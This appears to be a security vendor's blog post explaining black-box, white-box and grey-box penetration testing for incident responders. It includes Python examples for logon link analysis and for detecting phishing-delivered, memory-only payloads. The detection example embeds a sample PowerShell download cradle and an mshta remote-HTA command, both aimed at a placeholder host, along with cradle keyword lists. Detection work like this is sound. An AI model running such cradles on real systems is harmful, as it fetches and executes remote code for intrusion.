A Deep Dive into Black-Box, White-Box and Grey-Box Penetration Testing
12/13/2024
Taking the time to understand adversary tools, techniques, and methodologies will help you gain confidence in your defense and know what to do in each situation. One way to do this is through penetration testing, which gives incident responders a path to turn knowledge into skills through practical application. You then refine those skills through practice and more testing, which improves each individual skill and helps you combine different skill sets with more speed and accuracy.
Penetration testing involves emulating adversary tradecraft to help responders understand attacker methodologies and why attackers combine particular techniques for specific scenarios and objectives. Doing this work helps you anticipate and counter those tactics and techniques. Different types of penetration testing build on this understanding in different ways and improve our confidence in the defense. Here is a look at how black-box, white-box, and grey-box testing work.
Black-Box Testing
Penetration tests simulate attacks on networks and systems to uncover vulnerabilities and weaknesses. When responders deal with a cyber attack, they must contend not only with what is “known” about the attack but also with the “unknown.” This includes questions like:
- What was the actor able to accomplish?
- What new problems result from workarounds?
- How many systems have similar vulnerabilities?
The best way to answer these questions is to hunt for and detect post-exploitation activity, mapping the observed behavior to MITRE ATT&CK, a framework that catalogs attacker tactics and techniques.
How it works
Black-box testing simulates an attack in which little or no information about the system is available to the tester. The point is that what is “known” during an incident is often only the surface of the problem and changes depending on what has been shared or discovered. Much of the threat landscape remains hidden until further investigation occurs, so responders must work in environments with minimal information, often with limited help from open-source tooling, and that requires deeper analysis.
This type of testing encourages analysts to work from observed patterns and behaviors, applying behavioral analytics, frequency analysis, time-series analysis, and link analysis to quickly identify the users and systems involved in or affected by the compromise. Models like the Diamond Model and the Cyber Kill Chain give structure to the artifacts recovered (such as malware) and provide context as responders build a complete picture of the incident, the extent of the damage, and the plan for mitigation and eradication.
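As an added illustration of the analysis methods named above (this is example code written for this page, not code from the original post or from Phoenix Cyber), the following Python applies frequency analysis (“stacking”), a time-of-day filter, and time-aware link analysis to a handful of constructed network-logon records in the shape of Windows Security event 4624, logon type 3. Host names, account names, and timestamps are invented; the constructed starting point is that workstation WS-07 is known to be compromised, and the question is which other hosts the intruder could have reached.

```python
"""Frequency, time-of-day and link analysis over constructed logon records."""
import heapq
from collections import Counter, defaultdict

# Constructed sample (not real telemetry): network logons as
# (timestamp, account, source_host, destination_host).
LOGONS = [
    ("2024-12-01T08:01:10", "alice", "WS-01", "FS-01"),
    ("2024-12-01T08:03:42", "bob", "WS-02", "FS-01"),
    ("2024-12-01T09:15:05", "alice", "WS-01", "FS-01"),
    ("2024-12-01T10:20:31", "bob", "WS-02", "FS-01"),
    ("2024-12-01T11:02:00", "svc_backup", "SRV-01", "FS-01"),
    ("2024-12-01T13:40:12", "alice", "WS-01", "FS-01"),
    ("2024-12-01T14:11:58", "bob", "WS-02", "PRINT-01"),
    ("2024-12-01T23:47:03", "alice", "WS-07", "DC-01"),    # alice from a new host, off-hours
    ("2024-12-01T23:49:21", "alice", "WS-07", "SRV-01"),
    ("2024-12-01T23:52:44", "svc_backup", "SRV-01", "DB-01"),  # service account leaves its lane
]


def stack(events, key):
    """Frequency analysis ("stacking"): count how often each feature value occurs."""
    return Counter(key(e) for e in events)


def rare_combinations(events, max_count=1):
    """(account, source, destination) triples seen at most max_count times.

    Long-tail entries are where new or unusual access tends to show up."""
    counts = stack(events, lambda e: (e[1], e[2], e[3]))
    return sorted(k for k, c in counts.items() if c <= max_count)


def off_hours(events, start=7, end=19):
    """Time-series style filter: logons outside the business-hours window."""
    return [e for e in events if not start <= int(e[0][11:13]) < end]


def scope_from_host(events, start_host):
    """Link analysis: from a host believed compromised, follow logon edges
    forward in time to find every host the intruder could have reached.

    Only edges that occur at or after the moment the source host is first
    reached count, so a legitimate earlier logon from that host is not
    mistaken for lateral movement.

    Returns {host: (first_logon_time, account, from_host)}."""
    edges = defaultdict(list)  # source_host -> [(timestamp, account, destination)]
    for ts, acct, src, dst in events:
        edges[src].append((ts, acct, dst))

    first_seen = {start_host: ("", None, None)}  # "" sorts before any ISO timestamp
    heap = [("", start_host)]                     # earliest-compromise-first traversal
    while heap:
        since, host = heapq.heappop(heap)
        if since != first_seen[host][0]:
            continue  # stale heap entry; an earlier path to this host was found
        for ts, acct, dst in edges[host]:
            if ts >= since and (dst not in first_seen or ts < first_seen[dst][0]):
                first_seen[dst] = (ts, acct, host)
                heapq.heappush(heap, (ts, dst))
    return {h: v for h, v in first_seen.items() if h != start_host}


if __name__ == "__main__":
    print("rare:", rare_combinations(LOGONS))
    print("off-hours:", off_hours(LOGONS))
    print("reachable from WS-07:", scope_from_host(LOGONS, "WS-07"))
```

On this sample, the stacking step surfaces the one-off WS-07 logons, the off-hours filter isolates the three late-night events, and the link analysis scopes the intrusion to DC-01, SRV-01 and DB-01 while correctly excluding FS-01, which the backup service account touched before SRV-01 was reached.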
Black-box testing pushes responders to think beyond what they know, using deeper analytical methods to uncover the full nature of an attack, including unexpected threats or behaviors that may not be immediately visible.
White-Box Testing
An analyst’s job is to defend the network, but to do that they must actively interpret attacks and solve problems in stressful situations, often under time constraints. They have to think quickly to deny opportunities to exploit vulnerabilities, identify and counter the offensive techniques the attacker is using, evaluate how successful the adversary’s actions were, and explain the logic and intent behind the adversary’s actions and decisions.
How it works
This requires practicing the act of gathering different pieces of information and identifying relationships and correlations between them to build a complete picture of adversary operations. Training labs are effective learning tools because they offer analysts different levels of available information and different scenarios matched to their skill and experience. White-box testing, where the tester is given full knowledge of the environment, aims to increase a responder’s understanding of adversary approaches and attacks.
Testing must present realistic scenarios with different levels of visibility into logging, users, systems, analysis tools, and management tasks. Completing these scenarios requires different combinations of commercial and open-source data, artifacts obtained from incident response and triage, and digital forensics and incident response (DFIR) skill sets. Through these exercises, responders gain experience integrating a variety of tools and information to predict and anticipate adversary actions and to determine how, why, and when they are most likely to occur.
Grey-Box Testing
Grey-box testing aims to improve a responder’s ability to prioritize and address the key issues during an incident. To do this, we need a clear understanding of which offensive actions are being performed, why they are being used, and what an adversary can obtain or accomplish on a system at any given time. The primary focus of grey-box testing is adjusting the amount of information visible to the tester and presenting multiple test cases for the techniques adversaries rely on most often (“high-percentage” techniques).
How it works
For example, many consider phishing the most effective technique for gaining a foothold on a network, while in-memory code injection is one of the most effective ways to operate on a compromised machine without being detected, because the malicious code is never written to disk. Several payload-delivery methods combine the two: the phishing lure launches a small loader that fetches and executes the real payload entirely in memory. Because these attacks leave few traces on disk, analysts need to focus on discovering memory-only artifacts, the remnants of malicious activity that exist only in the system’s memory. Note that surviving a reboot still normally requires some small on-disk or registry foothold (a scheduled task, a Run key, or a WMI subscription that relaunches the in-memory stage), so memory artifacts should be correlated with those. Identifying these artifacts is crucial for fully understanding the scope of an attack and successfully completing the scoping, containment, and eradication phases of incident response.
Grey-box testing scenarios present analysts with various implementations of these high-percentage techniques. During testing, the visibility of certain aspects of the attack is also adjusted to expose analysts to different perspectives on the same techniques. For example, they might be shown different ways malware interacts with the Windows API or how memory-only malware is deployed through phishing. This helps analysts become more versatile in detecting and responding to these types of attacks.
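The two grey-box paragraphs above describe the same high-percentage chain from the defender’s side: a phishing document spawns a script host that pulls and runs its payload in memory. As an added example (written for this page; it is not code from the original post or from Phoenix Cyber), the Python below triages a few constructed process-creation events in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) and flags the Office-to-script-host pattern, a PowerShell -EncodedCommand payload (which it decodes from UTF-16LE base64), in-memory download cradles, hidden windows, and remote content. The executable paths, the example.invalid URLs, and the encoded command are all constructed; the “payload” is a harmless string encoded at import time so the sample stays self-contained.

```python
"""Triage of constructed process-creation events for phishing-delivered,
memory-only payloads (Office parent -> script host with an in-memory cradle)."""
import base64
import re

# Constructed sample payload: a classic download cradle, encoded the way
# PowerShell expects for -EncodedCommand (UTF-16LE, then base64).
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_ENC = base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode("ascii")

# Constructed events (not real telemetry) in the shape of Sysmon Event ID 1.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",                      # benign interactive use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",                            # Word printing, benign
     "CommandLine": "splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},  # macro -> cradle
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",                      # HTA lure from mail
     "CommandLine": "mshta.exe http://example.invalid/invoice.hta"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
CRADLE_MARKERS = ("downloadstring", "downloaddata", "iex", "invoke-expression",
                  "frombase64string", "reflection.assembly", "virtualalloc")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# Requiring a long base64 token keeps "-ExecutionPolicy Bypass" from matching.
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path):
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE, so not an encoded command


def score_event(event):
    """List the reasons an event looks like a phishing-delivered in-memory payload."""
    reasons = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd) or ""
    text = (cmd + " " + decoded).lower()  # inspect the decoded command too
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    if decoded:
        reasons.append("encoded-command")
    if any(marker in text for marker in CRADLE_MARKERS):
        reasons.append("in-memory-cradle")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE):
        reasons.append("hidden-window")
    if re.search(r"https?://", text):
        reasons.append("remote-content")
    return reasons


def triage(events, min_reasons=2):
    """Return (image name, reasons) for events with at least min_reasons indicators."""
    flagged = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            flagged.append((basename(event["Image"]), reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(EVENTS):
        print(name, "->", ", ".join(reasons))
```

Requiring two independent indicators is what keeps the benign PowerShell and Word-printing events out of the result while both lures (the encoded cradle and the remote HTA) are flagged; a single rule such as “Office spawned a script host” would be the place to start a memory capture of the child process, since the payload it runs will not be found on disk.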
Contact Phoenix Cyber now to learn more about how to implement these different types of testing into your processes.